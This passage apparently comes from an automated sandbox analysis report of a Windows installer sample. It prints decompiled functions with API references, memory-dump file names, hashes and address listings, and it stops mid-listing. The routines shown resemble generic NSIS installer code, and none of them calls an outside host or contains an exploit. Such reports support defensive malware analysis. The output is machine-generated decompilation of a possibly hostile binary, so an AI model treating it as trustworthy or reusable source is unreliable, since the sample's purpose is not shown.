APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,76F1FAA0,C:\Users\user\AppData\Local\Temp\,?,004034E5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00406804
CharNextW.USER32(?,?,?,00000000,?,004034E5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00406813
CharNextW.USER32(?,00000000,76F1FAA0,C:\Users\user\AppData\Local\Temp\,?,004034E5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00406818
CharPrevW.USER32(?,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\,?,004034E5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 0040682B

Strings

*?|<>/":, xrefs: 004067F3
C:\Users\user\AppData\Local\Temp\, xrefs: 004067A2

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-826357637
Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction ID: df5be6298df38fe53a3c1647d4a953459580f705d81a6df7816dadf9acb4bb56
Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction Fuzzy Hash: C0110D2680161295DB3037149D84A7766F8EF58BA4F56803FED86732C0F77C4C9286BD

Uniqueness

Uniqueness Score: -1.00%

Function 00404E31 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404E31(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404e3f
0x00404e4c
0x00404e52
0x00404e90
0x00404e90
0x00404e9f
0x00404ea6
0x00000000
0x00404ea8
0x00404e54
0x00404e63
0x00404e6b
0x00404e6e
0x00404e80
0x00404e86
0x00404e8d
0x00000000
0x00404e8d
0x00000000

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E4C
GetMessagePos.USER32 ref: 00404E54
ScreenToClient.USER32 ref: 00404E6E
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404E80
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EA6

Strings

f, xrefs: 00404E82

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction ID: da5f2d6a974e9c572a85d9e94ff0a86548add23bfd296e24df18a92b611d7590
Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction Fuzzy Hash: 2F018C71900219BADB00DBA4DD81BFEBBBCAB94710F10002BBB10B61C0C7B4AA018BA4

Uniqueness

Uniqueness Score: -1.00%

Function 732D16BD Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E732D16BD(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t14;

				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t14);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}

0x732d16d7
0x732d16e3
0x732d16f0
0x732d16f7
0x732d1700
0x732d170c

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,732D22D8,?,00000808), ref: 732D16D5
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,732D22D8,?,00000808), ref: 732D16DC
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,732D22D8,?,00000808), ref: 732D16F0
GetProcAddress.KERNEL32(732D22D8,00000000), ref: 732D16F7
GlobalFree.KERNEL32 ref: 732D1700

Strings

Nv@hv, xrefs: 732D16F7

Memory Dump Source

Source File: 00000001.00000002.886480223.00000000732D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 732D0000, based on PE: true

Associated: 00000001.00000002.886476119.00000000732D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.886488080.00000000732D4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.886506522.00000000732D6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_732d0000_aSsc9zh1ex.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID: Nv@hv
API String ID: 1148316912-4226514844
Opcode ID: fe4ee7051e3578ffed058cb2cb0eb728dda0b8f91cda2be53ed91db8803a7ea4
Instruction ID: 549e7d9b81cbb398c300fa668a0053b1d16741fbdc769662e77c99739b5cf0d9
Opcode Fuzzy Hash: fe4ee7051e3578ffed058cb2cb0eb728dda0b8f91cda2be53ed91db8803a7ea4
Instruction Fuzzy Hash: 2CF012735161387BD62026A79C4CD9B7E9CDF8B2F6B214251F61CD119089615C11D7F1

Uniqueness

Uniqueness Score: -1.00%

Function 00402F93 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x7936f8; // 0x4fcbb
					_t11 =  *0x79f704; // 0x4fcbf
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}

0x00402fa3
0x00402fb1
0x00402fb7
0x00402fb7
0x00402fc5
0x00402fc7
0x00402fcd
0x00402fd4
0x00402fd6
0x00402fd6
0x00402fec
0x00402ffc
0x0040300e
0x0040300e
0x00403016

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
MulDiv.KERNEL32(0004FCBB,00000064,0004FCBF), ref: 00402FDC
wsprintfW.USER32 ref: 00402FEC
SetWindowTextW.USER32(?,?), ref: 00402FFC
SetDlgItemTextW.USER32 ref: 0040300E

Strings

verifying installer: %d%%, xrefs: 00402FE6

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: d023595f9e9ef59bdd75dda31b52a3c2e885d3e2bc42a898f2d7cd706f4c6b2f
Instruction ID: 93fc8baa8d380bd3002b945ae1bdcf8604075b20dc3457daa0419b6feabf18a2
Opcode Fuzzy Hash: d023595f9e9ef59bdd75dda31b52a3c2e885d3e2bc42a898f2d7cd706f4c6b2f
Instruction Fuzzy Hash: EC014F7064020DBBEF209F60DE4ABEA3B79EB00345F108039FA06B51D0DBB99A559B58

Uniqueness

Uniqueness Score: -1.00%

Function 732D2655 Relevance: 9.1, APIs: 6, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E732D2655() {
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t27;
				signed int _t39;
				void* _t40;
				void* _t43;
				intOrPtr _t44;
				void* _t45;

				_t40 = E732D12BB();
				_t24 =  *((intOrPtr*)(_t45 + 0x18));
				_t44 =  *((intOrPtr*)(_t24 + 0x1014));
				_t43 = (_t44 + 0x81 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t43 - 4)) >= 0) {
					}
					_t39 =  *(_t43 - 8) & 0x000000ff;
					if(_t39 <= 7) {
						switch( *((intOrPtr*)(_t39 * 4 +  &M732D2784))) {
							case 0:
								 *_t40 = 0;
								goto L17;
							case 1:
								__eax =  *__eax;
								if(__ecx > __ebx) {
									 *(__esp + 0x10) = __ecx;
									__ecx =  *(0x732d407c + __edx * 4);
									__edx =  *(__esp + 0x10);
									__ecx = __ecx * __edx;
									asm("sbb edx, edx");
									__edx = __edx & __ecx;
									__eax = __eax &  *(0x732d409c + __edx * 4);
								}
								_push(__eax);
								goto L15;
							case 2:
								__eax = E732D1510(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L16;
							case 3:
								__ecx =  *0x732d506c;
								__edx = __ecx - 1;
								__eax = MultiByteToWideChar(__ebx, __ebx,  *__eax, __ecx, __edi, __edx);
								__eax =  *0x732d506c;
								 *((short*)(__edi + __eax * 2 - 2)) = __bx;
								goto L17;
							case 4:
								__eax = lstrcpynW(__edi,  *__eax,  *0x732d506c);
								goto L17;
							case 5:
								_push( *0x732d506c);
								_push(__edi);
								_push( *__eax);
								__imp__StringFromGUID2();
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfW(__edi, 0x732d5000);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					_t26 =  *(_t43 + 0x14);
					if(_t26 != 0 && ( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x18)))) != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
						GlobalFree(_t26);
					}
					_t27 =  *((intOrPtr*)(_t43 + 0xc));
					if(_t27 != 0) {
						if(_t27 != 0xffffffff) {
							if(_t27 > 0) {
								E732D1381(_t27 - 1, _t40);
								goto L26;
							}
						} else {
							E732D1312(_t40);
							L26:
						}
					}
					_t44 = _t44 - 1;
					_t43 = _t43 - 0x20;
				} while (_t44 >= 0);
				return GlobalFree(_t40);
			}

0x732d265f
0x732d2661
0x732d2665
0x732d2674
0x732d2678
0x732d267d
0x732d267d
0x732d2685
0x732d268c
0x732d2692
0x00000000
0x732d2699
0x00000000
0x00000000
0x732d26a1
0x732d26a5
0x732d26a8
0x732d26ac
0x732d26b3
0x732d26b7
0x732d26bd
0x732d26bf
0x732d26c1
0x732d26c1
0x732d26c8
0x00000000
0x00000000
0x732d26d1
0x00000000
0x00000000
0x732d26d8
0x732d26de
0x732d26e8
0x732d26ee
0x732d26f3
0x00000000
0x00000000
0x732d2714
0x00000000
0x00000000
0x732d26fa
0x732d2700
0x732d2701
0x732d2703
0x00000000
0x00000000
0x732d271c
0x732d271e
0x732d2724
0x732d272a
0x732d272a
0x00000000
0x00000000
0x732d2692
0x732d272d
0x732d272d
0x732d2732
0x732d2743
0x732d2743
0x732d2749
0x732d274e
0x732d2753
0x732d275f
0x732d2764
0x00000000
0x732d2769
0x732d2755
0x732d2756
0x732d276a
0x732d276a
0x732d2753
0x732d276b
0x732d276c
0x732d276f
0x732d2783

APIs

Part of subcall function 732D12BB: GlobalAlloc.KERNELBASE(00000040,?,732D12DB,?,732D137F,00000019,732D11CA,-000000A0), ref: 732D12C5

GlobalFree.KERNEL32 ref: 732D2743
GlobalFree.KERNEL32 ref: 732D2778

Memory Dump Source

Source File: 00000001.00000002.886480223.00000000732D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 732D0000, based on PE: true

Associated: 00000001.00000002.886476119.00000000732D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.886488080.00000000732D4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.886506522.00000000732D6000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_732d0000_aSsc9zh1ex.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 448964dd1662868ec9ed14a2b87de4e8af0c924959588158d38daf0285d9a029
Instruction ID: ada68dd481daef3d3ba4d1849be8259cb75307ac4c52d958698e5aa718b410bb
Opcode Fuzzy Hash: 448964dd1662868ec9ed14a2b87de4e8af0c924959588158d38daf0285d9a029
Instruction Fuzzy Hash: DF313772A3431ADFE7269F61D8C8F2A77BAFF85302324816CF10583550C7756891EB51

Uniqueness

Uniqueness Score: -1.00%

Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00402950(int __ebx, void* __eflags) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				int _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405E60(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00405FE5(_t55);
				_t29 = E0040600A(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x7a8a74;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004034C2(_t49);
							E004034AC(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00405FC5( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E004060BC( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}

0x00402950
0x00402952
0x00402957
0x0040295c
0x0040295f
0x00402969
0x0040296d
0x0040296d
0x00402973
0x00402980
0x00402988
0x0040298b
0x00402997
0x0040299a
0x004029a0
0x004029ae
0x004029b3
0x004029b7
0x004029ba
0x004029c3
0x004029cf
0x004029d3
0x004029d6
0x004029e0
0x004029ff
0x004029ec
0x004029f4
0x004029f7
0x004029fc
0x004029fc
0x00402a06
0x00402a06
0x00402a13
0x00402a19
0x00402a1f
0x00402a1f
0x004029b7
0x00402a33
0x00402a35
0x00402a35
0x00402a3f
0x00402a40
0x00402a44
0x00402a48
0x00402a4e
0x00402a4e
0x00402a55
0x004022f1
0x00402c2d
0x00402c39

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
GlobalFree.KERNEL32 ref: 00402A06
GlobalFree.KERNEL32 ref: 00402A19
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 7cb88154959430789f3c0562538d20fa3cf9f322f701f7308e619775f0ab440c
Instruction ID: ce13e03cd45963b48540e15e7c975c75beca6294bacda27d7b2280c3fc44a057
Opcode Fuzzy Hash: 7cb88154959430789f3c0562538d20fa3cf9f322f701f7308e619775f0ab440c
Instruction Fuzzy Hash: CA31B171D00124BBCF216FA5CE89D9EBE79EF49364F14423AF450762E1CB794C429B98

Uniqueness

Uniqueness Score: -1.00%

Function 732D1979 Relevance: 7.7, APIs: 5, Instructions: 194
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E732D1979(signed int __edx, void* __eflags, void* _a8, void* _a16) {
				void* _v8;
				signed int _v12;
				signed int _v20;
				signed int _v24;
				char _v76;
				void _t45;
				signed int _t46;
				signed int _t47;
				signed int _t48;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t60;
				signed int _t61;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				signed int _t77;
				void* _t81;
				signed int _t83;
				signed int _t85;
				signed int _t87;
				signed int _t90;
				void* _t101;

				_t85 = __edx;
				 *0x732d506c = _a8;
				_t77 = 0;
				 *0x732d5070 = _a16;
				_v12 = 0;
				_v8 = E732D12E3();
				_t90 = E732D13B1(_t42);
				_t87 = _t85;
				_t81 = E732D12E3();
				_a8 = _t81;
				_t45 =  *_t81;
				if(_t45 != 0x7e && _t45 != 0x21) {
					_a16 = E732D12E3();
					_t77 = E732D13B1(_t74);
					_v12 = _t85;
					GlobalFree(_a16);
					_t81 = _a8;
				}
				_t46 =  *_t81 & 0x0000ffff;
				_t101 = _t46 - 0x2f;
				if(_t101 > 0) {
					_t47 = _t46 - 0x3c;
					__eflags = _t47;
					if(_t47 == 0) {
						__eflags =  *((short*)(_t81 + 2)) - 0x3c;
						if( *((short*)(_t81 + 2)) != 0x3c) {
							__eflags = _t87 - _v12;
							if(__eflags > 0) {
								L56:
								_t48 = 0;
								__eflags = 0;
								L57:
								asm("cdq");
								L58:
								_t90 = _t48;
								_t87 = _t85;
								L59:
								E732D1510(_t85, _t90, _t87,  &_v76);
								E732D1312( &_v76);
								GlobalFree(_v8);
								return GlobalFree(_a8);
							}
							if(__eflags < 0) {
								L49:
								__eflags = 0;
								L50:
								_t48 = 1;
								goto L57;
							}
							__eflags = _t90 - _t77;
							if(_t90 < _t77) {
								goto L49;
							}
							goto L56;
						}
						_t85 = _t87;
						_t48 = E732D3050(_t90, _t77, _t85);
						goto L58;
					}
					_t57 = _t47 - 1;
					__eflags = _t57;
					if(_t57 == 0) {
						__eflags = _t90 - _t77;
						if(_t90 != _t77) {
							goto L56;
						}
						__eflags = _t87 - _v12;
						if(_t87 != _v12) {
							goto L56;
						}
						goto L49;
					}
					_t58 = _t57 - 1;
					__eflags = _t58;
					if(_t58 == 0) {
						__eflags =  *((short*)(_t81 + 2)) - 0x3e;
						if( *((short*)(_t81 + 2)) != 0x3e) {
							__eflags = _t87 - _v12;
							if(__eflags < 0) {
								goto L56;
							}
							if(__eflags > 0) {
								goto L49;
							}
							__eflags = _t90 - _t77;
							if(_t90 <= _t77) {
								goto L56;
							}
							goto L49;
						}
						__eflags =  *((short*)(_t81 + 4)) - 0x3e;
						_t85 = _t87;
						_t59 = _t90;
						_t83 = _t77;
						if( *((short*)(_t81 + 4)) != 0x3e) {
							_t48 = E732D3070(_t59, _t83, _t85);
						} else {
							_t48 = E732D30A0(_t59, _t83, _t85);
						}
						goto L58;
					}
					_t60 = _t58 - 0x20;
					__eflags = _t60;
					if(_t60 == 0) {
						_t90 = _t90 ^ _t77;
						_t87 = _t87 ^ _v12;
						goto L59;
					}
					_t61 = _t60 - 0x1e;
					__eflags = _t61;
					if(_t61 == 0) {
						__eflags =  *((short*)(_t81 + 2)) - 0x7c;
						if( *((short*)(_t81 + 2)) != 0x7c) {
							_t90 = _t90 | _t77;
							_t87 = _t87 | _v12;
							goto L59;
						}
						__eflags = _t90 | _t87;
						if((_t90 | _t87) != 0) {
							goto L49;
						}
						__eflags = _t77 | _v12;
						if((_t77 | _v12) != 0) {
							goto L49;
						}
						goto L56;
					}
					__eflags = _t61 == 0;
					if(_t61 == 0) {
						_t90 =  !_t90;
						_t87 =  !_t87;
					}
					goto L59;
				}
				if(_t101 == 0) {
					L21:
					__eflags = _t77 | _v12;
					if((_t77 | _v12) != 0) {
						_v24 = E732D2EE0(_t90, _t87, _t77, _v12);
						_v20 = _t85;
						_t48 = E732D2F90(_t90, _t87, _t77, _v12);
						_t81 = _a8;
					} else {
						_v24 = _v24 & 0x00000000;
						_v20 = _v20 & 0x00000000;
						_t48 = _t90;
						_t85 = _t87;
					}
					__eflags =  *_t81 - 0x2f;
					if( *_t81 != 0x2f) {
						goto L58;
					} else {
						_t90 = _v24;
						_t87 = _v20;
						goto L59;
					}
				}
				_t67 = _t46 - 0x21;
				if(_t67 == 0) {
					_t48 = 0;
					__eflags = _t90 | _t87;
					if((_t90 | _t87) != 0) {
						goto L57;
					}
					goto L50;
				}
				_t68 = _t67 - 4;
				if(_t68 == 0) {
					goto L21;
				}
				_t69 = _t68 - 1;
				if(_t69 == 0) {
					__eflags =  *((short*)(_t81 + 2)) - 0x26;
					if( *((short*)(_t81 + 2)) != 0x26) {
						_t90 = _t90 & _t77;
						_t87 = _t87 & _v12;
						goto L59;
					}
					__eflags = _t90 | _t87;
					if((_t90 | _t87) == 0) {
						goto L56;
					}
					__eflags = _t77 | _v12;
					if((_t77 | _v12) == 0) {
						goto L56;
					}
					goto L49;
				}
				_t70 = _t69 - 4;
				if(_t70 == 0) {
					_t48 = E732D2EA0(_t90, _t87, _t77, _v12);
					goto L58;
				} else {
					_t71 = _t70 - 1;
					if(_t71 == 0) {
						_t90 = _t90 + _t77;
						asm("adc edi, [ebp-0x8]");
					} else {
						if(_t71 == 0) {
							_t90 = _t90 - _t77;
							asm("sbb edi, [ebp-0x8]");
						}
					}
					goto L59;
				}
			}

0x732d1979
0x732d1983
0x732d198c
0x732d198f
0x732d1994
0x732d199d
0x732d19a6
0x732d19a8
0x732d19af
0x732d19b1
0x732d19b4
0x732d19bb
0x732d19c9
0x732d19d2
0x732d19d7
0x732d19da
0x732d19e0
0x732d19e0
0x732d19e3
0x732d19e6
0x732d19e9
0x732d1ab1
0x732d1ab1
0x732d1ab4
0x732d1b34
0x732d1b39
0x732d1b48
0x732d1b4b
0x732d1b53
0x732d1b53
0x732d1b53
0x732d1b55
0x732d1b55
0x732d1b56
0x732d1b56
0x732d1b58
0x732d1b5a
0x732d1b60
0x732d1b69
0x732d1b7a
0x732d1b85
0x732d1b85
0x732d1b4d
0x732d1b2f
0x732d1b2f
0x732d1b31
0x732d1b31
0x00000000
0x732d1b31
0x732d1b4f
0x732d1b51
0x00000000
0x00000000
0x00000000
0x732d1b51
0x732d1b3d
0x732d1b41
0x00000000
